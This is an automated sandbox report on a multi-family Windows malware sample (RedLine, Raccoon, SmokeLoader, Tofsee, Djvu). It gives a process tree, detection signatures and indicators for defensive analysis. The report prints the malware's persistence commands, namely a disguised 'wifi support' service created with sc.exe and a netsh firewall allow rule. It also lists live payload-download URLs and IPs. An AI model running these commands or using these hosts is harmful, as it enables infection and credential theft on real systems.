Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report V91yW08J6p.exe

Overview

General Information

Sample Name:V91yW08J6p.exe
Analysis ID:551101
MD5:d609a21245d77dccd6d4a659cbd9466a
SHA1:a8775ccb1d6b7b941e5b37d59db5d25f4b736cf9
SHA256:a0f70f88c9a376e7c0f7e508c796bf1dbbf58ff8b172b9aff3421be63e2d7f78
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Djvu Raccoon RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to evade analysis by execution special instruction which cause usermode exception
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
Connects to a URL shortener service
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evaded block containing many API calls
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • V91yW08J6p.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\V91yW08J6p.exe" MD5: D609A21245D77DCCD6D4A659CBD9466A)
    • V91yW08J6p.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\V91yW08J6p.exe" MD5: D609A21245D77DCCD6D4A659CBD9466A)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 7CCD.exe (PID: 808 cmdline: C:\Users\user\AppData\Local\Temp\7CCD.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
        • 76E7.exe (PID: 5964 cmdline: C:\Users\user\AppData\Local\Temp\76E7.exe MD5: 2AE79DF2C51EF858F5483314B6B83FA0)
        • 6902.exe (PID: 1716 cmdline: C:\Users\user\AppData\Local\Temp\6902.exe MD5: F4C254B2556531003266AF2D9D74B625)
          • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ejdjvovs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4788 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 5636 cmdline: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1496 cmdline: C:\Windows\System32\sc.exe" description ejdjvovs "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6252 cmdline: "C:\Windows\System32\sc.exe" start ejdjvovs MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6856 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 768F.exe (PID: 4640 cmdline: C:\Users\user\AppData\Local\Temp\768F.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 768F.exe (PID: 6952 cmdline: C:\Users\user\AppData\Local\Temp\768F.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • 768F.exe (PID: 1548 cmdline: C:\Users\user\AppData\Local\Temp\768F.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • E6AF.exe (PID: 6828 cmdline: C:\Users\user\AppData\Local\Temp\E6AF.exe MD5: 27F38096E53A91C525B0700700CEE4C4)
        • FF1A.exe (PID: 3120 cmdline: C:\Users\user\AppData\Local\Temp\FF1A.exe MD5: C80F38DA2951D491B7EDF24F89235293)
          • FF1A.exe (PID: 3400 cmdline: C:\Users\user\AppData\Local\Temp\FF1A.exe MD5: C80F38DA2951D491B7EDF24F89235293)
        • 2D5.exe (PID: 5640 cmdline: C:\Users\user\AppData\Local\Temp\2D5.exe MD5: C388DB9CA136D19310B76EF81E54FC12)
        • 4ED.exe (PID: 6156 cmdline: C:\Users\user\AppData\Local\Temp\4ED.exe MD5: 7FE15A5F306240209441F528BE0F5783)
          • AppLaunch.exe (PID: 5756 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • backgroundTaskHost.exe (PID: 5964 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
        • 1365.exe (PID: 4248 cmdline: C:\Users\user\AppData\Local\Temp\1365.exe MD5: DC36EBFC2796806A965589566C81E2A1)
        • 28B3.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\28B3.exe MD5: B5536B068BB1098A1030F8C7DF17BFD2)
        • 2941.exe (PID: 6996 cmdline: C:\Users\user\AppData\Local\Temp\2941.exe MD5: 5263F286E45A03C8309FC8BB49E0F19A)
  • adiicvb (PID: 5872 cmdline: C:\Users\user\AppData\Roaming\adiicvb MD5: D609A21245D77DCCD6D4A659CBD9466A)
    • adiicvb (PID: 6676 cmdline: C:\Users\user\AppData\Roaming\adiicvb MD5: D609A21245D77DCCD6D4A659CBD9466A)
  • qxoxlxqh.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe" MD5: EAE6D58C8C1CB389453AF3692BF58DA8)
    • svchost.exe (PID: 2224 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 6532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • vsiicvb (PID: 6728 cmdline: C:\Users\user\AppData\Roaming\vsiicvb MD5: 277680BD3182EB0940BC356FF4712BEF)
  • svchost.exe (PID: 5668 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.807939940.00000000005B0000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
      • 0xe23ea:$s1: http://
      • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
      • 0xe23ea:$f1: http://
      00000026.00000000.927572070.0000000000400000.00000040.00000001.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        0000000B.00000003.814707254.0000000000600000.00000004.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
          00000025.00000002.1069240289.00000000007B4000.00000004.00000020.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 44 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.V91yW08J6p.exe.5415a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              13.2.768F.exe.391ba90.2.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                11.2.6902.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                  13.2.768F.exe.37df910.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    26.3.qxoxlxqh.exe.d70000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                      Click to see the 15 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspect Svchost ActivityShow sources
                      Source: Process startedAuthor: David Burkett: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe", ParentImage: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe, ParentProcessId: 5788, ProcessCommandLine: svchost.exe, ProcessId: 2224
                      Sigma detected: Copying Sensitive Files with Credential DataShow sources
                      Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6902.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6902.exe, ParentProcessId: 1716, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qxoxlxqh.exe" C:\Windows\SysWOW64\ejdjvovs\, ProcessId: 4788
                      Sigma detected: Suspicious Svchost ProcessShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d"C:\Users\user\AppData\Local\Temp\6902.exe", ParentImage: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe, ParentProcessId: 5788, ProcessCommandLine: svchost.exe, ProcessId: 2224
                      Sigma detected: Netsh Port or Application AllowedShow sources
                      Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6902.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6902.exe, ParentProcessId: 1716, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6856
                      Sigma detected: New Service CreationShow sources
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\6902.exe, ParentImage: C:\Users\user\AppData\Local\Temp\6902.exe, ParentProcessId: 1716, ProcessCommandLine: C:\Windows\System32\sc.exe" create ejdjvovs binPath= "C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe /d\"C:\Users\user\AppData\Local\Temp\6902.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 5636

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000021.00000002.1065071680.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000003.885517058.0000000004950000.00000004.00000001.sdmp, type: MEMORY
                      Antivirus detection for URL or domainShow sources
                      Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                      Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/game.exeAvira URL Cloud: Label: malware
                      Source: http://data-host-coin-8.com/files/9993_1641737702_2517.exeAvira URL Cloud: Label: malware
                      Source: http://unic11m.top/install1.exeAvira URL Cloud: Label: malware
                      Source: http://78.46.160.87/mozglue.dllAvira URL Cloud: Label: malware
                      Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                      Source: http://unicupload.top/install1.exeAvira URL Cloud: Label: malware
                      Source: http://78.46.160.87/565Avira URL Cloud: Label: malware
                      Source: http://78.46.160.87/freebl3.dllAvira URL Cloud: Label: malware
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\E6AF.exeAvira: detection malicious, Label: TR/AD.StellarStealer.rfurr
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeAvira: detection malicious, Label: HEUR/AGEN.1211353
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: V91yW08J6p.exeReversingLabs: Detection: 46%
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeReversingLabs: Detection: 67%
                      Machine Learning detection for sampleShow sources
                      Source: V91yW08J6p.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\FF1A.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\1365.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\E6AF.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\qxoxlxqh.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2D5.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\vsiicvbJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\2941.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\adiicvbJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\768F.exeJoe Sandbox ML: detected
                      Source: 26.3.qxoxlxqh.exe.d70000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 8.2.76E7.exe.20d0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.3.6902.exe.600000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.2.6902.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 8.3.76E7.exe.20f0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 26.2.qxoxlxqh.exe.d50e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.2.6902.exe.5e0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 26.2.qxoxlxqh.exe.db0000.2.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: 26.2.qxoxlxqh.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00407190 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D4A80 CryptStringToBinaryA,CryptStringToBinaryA,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D76C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D7760 CryptUnprotectData,LocalAlloc,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D73E0 CryptUnprotectData,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D79F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeUnpacked PE file: 8.2.76E7.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\6902.exeUnpacked PE file: 11.2.6902.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeUnpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exeUnpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
                      Source: V91yW08J6p.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\AppData\Local\Temp\7CCD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49854 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49857 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.102.49.170:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49870 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49875 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49882 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.4:49883 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.4:49889 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49890 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49891 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49894 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49900 version: TLS 1.2
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: Vt]C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: C:\cedelecesi-roputewelu21\ropofarax15\ca.pdb source: 6902.exe, 0000000B.00000002.841823438.0000000000675000.00000004.00000020.sdmp, 6902.exe, 0000000B.00000000.808532336.0000000000413000.00000002.00020000.sdmp, 6902.exe, 0000000B.00000002.840524705.0000000000415000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000000.840734241.0000000000413000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000002.850054459.0000000000415000.00000002.00020000.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
                      Source: Binary string: dC:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\76E7.exeCode function: 8_2_020D8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
